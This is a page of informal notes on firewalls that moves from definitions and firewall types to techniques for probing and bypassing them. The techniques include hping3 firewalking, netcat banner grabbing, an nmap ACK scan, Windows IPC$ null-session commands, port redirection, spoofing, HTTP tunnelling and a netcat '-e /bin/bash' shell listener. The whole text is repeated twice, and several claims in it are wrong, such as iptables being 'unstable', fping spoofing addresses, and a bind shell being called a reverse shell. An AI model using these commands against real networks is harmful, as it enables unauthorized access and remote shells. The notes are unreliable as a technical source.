What is a Firewall?
A system designed to prevent unauthorized access to or from a private network. Firewalls can be implemented in both hardware and software, or a combination of both. Firewalls are frequently used to prevent unauthorized Internet users from accessing private networks connected to the Internet, especially intranets. All messages entering or leaving the intranet pass through the firewall, which examines each message and blocks those that do not meet the specified security criteria.
Types of Firewall:
Placement of firewall is very important. There are firewall architectures:
Inbound and Outbound filtering
Permissive or Restrictive policies
Context-based firewalls
Zone-based firewall (zbf)
Firewall in linux:
firehog, iptables (unstable), firestarter
Firewall in windows (home)
blackice
Firewall policy should be reviwed every 90 days as a minimum.
Better: continuous process.
Electronic vaulting: periodic interval stroed on an offside location
remote journalling (data will be sent in real-time)
disk-shadowing (data will be written to multiple disk)
disk mirroring in local disk.
Circuit level gateway works at session level
NAT gateways are circuit-level gateways
Application-level firewall gateway will act as a proxy, and ask for credentials
To locate the firewall:
hping3 -S -c 2 -p 23 -n 172.16.16.100 //if not typing -c, it sends unlimited number of packet. -n is for numeric output
if there is a firewall, we will receive a message back from his address saying "ICMP packet filtered by <firewall_ip>)
if icmp messages are blocked, use tcp ! tcptraceroute, hping3-T, ...
Grabbing the banner
nc -vv 172.16.0.5 80
//connection succeeded !
HEAD /HTTP/1.0 // => we get the banner !
nc -vv mail.thehackernews.com 2
Create custom packets to get the answer:
nmap acknowlegment scan will tell us directly the open ports.
nmap -sA 172.16.16.100
In windows:
net use \\192.168.0.23\IPC$ 1234/u:administrator
to establish the tcp session to that host (same as "null"session commands)
in windows: net view \\172.16.90.35 //to see share folders
port redirection:
ex: if smtp blocked, send to a different port to another host, and use the host as a port redirection facility
windows tool:
foundstone Fpipe
Port redirection is detected by most good firewalls
there is also the less good winpipe
in linux, use Rinetd tool
Spoof address:
fping -a 172.16.3.37 192.168.12.2 -C 8
to send a fragmented packet: -f packet
covert from inside:
covert channel by establishing a reverse shell connection with netcat.
nc -vvl 3030 -e /bin/bash
to open a netcat server on port 3030
then on the client :
nc -vv <ip address> 3030 //and you have its shell !
If there is a NAT device between client and server, however, it cannot be done.
Best option is socat
Covert from outside:
http tunneling
in windows: httpport
in linux, http daemon (redhat)
fpipe (ubuntu)
This is an overview of a firewall, it is not explained completely, it's just an idea to the people who work with firewalls.
A system designed to prevent unauthorized access to or from a private network. Firewalls can be implemented in both hardware and software, or a combination of both. Firewalls are frequently used to prevent unauthorized Internet users from accessing private networks connected to the Internet, especially intranets. All messages entering or leaving the intranet pass through the firewall, which examines each message and blocks those that do not meet the specified security criteria.
Types of Firewall:
Network-Level Firewalls
Circuit-Level Firewalls
Application-Level Firewalls
Stateful Multi-level Firewalls
Placement of firewall is very important. There are firewall architectures:
Inbound and Outbound filtering
Permissive or Restrictive policies
Context-based firewalls
Zone-based firewall (zbf)
Firewall in linux:
firehog, iptables (unstable), firestarter
Firewall in windows (home)
blackice
Firewall policy should be reviwed every 90 days as a minimum.
Better: continuous process.
Electronic vaulting: periodic interval stroed on an offside location
remote journalling (data will be sent in real-time)
disk-shadowing (data will be written to multiple disk)
disk mirroring in local disk.
Circuit level gateway works at session level
NAT gateways are circuit-level gateways
Application-level firewall gateway will act as a proxy, and ask for credentials
To locate the firewall:
hping3 -S -c 2 -p 23 -n 172.16.16.100 //if not typing -c, it sends unlimited number of packet. -n is for numeric output
if there is a firewall, we will receive a message back from his address saying "ICMP packet filtered by <firewall_ip>)
if icmp messages are blocked, use tcp ! tcptraceroute, hping3-T, ...
Grabbing the banner
nc -vv 172.16.0.5 80
//connection succeeded !
HEAD /HTTP/1.0 // => we get the banner !
nc -vv mail.thehackernews.com 2
Create custom packets to get the answer:
nmap acknowlegment scan will tell us directly the open ports.
nmap -sA 172.16.16.100
In windows:
net use \\192.168.0.23\IPC$ 1234/u:administrator
to establish the tcp session to that host (same as "null"session commands)
in windows: net view \\172.16.90.35 //to see share folders
port redirection:
ex: if smtp blocked, send to a different port to another host, and use the host as a port redirection facility
windows tool:
foundstone Fpipe
Port redirection is detected by most good firewalls
there is also the less good winpipe
in linux, use Rinetd tool
Spoof address:
fping -a 172.16.3.37 192.168.12.2 -C 8
to send a fragmented packet: -f packet
covert from inside:
covert channel by establishing a reverse shell connection with netcat.
nc -vvl 3030 -e /bin/bash
to open a netcat server on port 3030
then on the client :
nc -vv <ip address> 3030 //and you have its shell !
If there is a NAT device between client and server, however, it cannot be done.
Best option is socat
Covert from outside:
http tunneling
in windows: httpport
in linux, http daemon (redhat)
fpipe (ubuntu)
This is an overview of a firewall, it is not explained completely, it's just an idea to the people who work with firewalls.
